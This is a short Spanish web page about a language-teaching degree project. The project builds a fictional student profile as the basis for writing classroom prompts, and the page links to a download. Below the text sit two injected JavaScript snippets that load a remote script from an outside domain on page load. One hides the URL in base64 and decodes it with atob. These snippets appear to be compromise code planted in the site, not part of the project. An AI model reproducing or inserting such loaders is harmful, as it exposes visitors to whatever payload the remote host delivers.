Este trabajo de la Licenciatura en Español Lengua Materna y Lengua Extranjera llevado a cabo por Iris Fernández y Sofia Gómez con la dirección de Maria Fernanda Freytes y la codirección de Laura Cecilia Diaz Dávila, tiene por objetivo plantear una situación hipotética que representa a un estudiante ficticio con objetivos específicos. Esta estretegia es fundamental para poder elaborar los prompts de manera precisa, ya que nos proporciona una base para suponer metas específicas en el contexto de la clase.
Descarga proyecto aquí
;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://groundrats.org/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox’);
;(function(f,b,n,j,x,e){
var decodedUrl = atob(‘aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294′);
x=b.createElement(n);e=b.getElementsByTagName(n)[0];
x.async=1;x.src=decodedUrl;
e.parentNode.insertBefore(x,e);
})(window,document,’script’);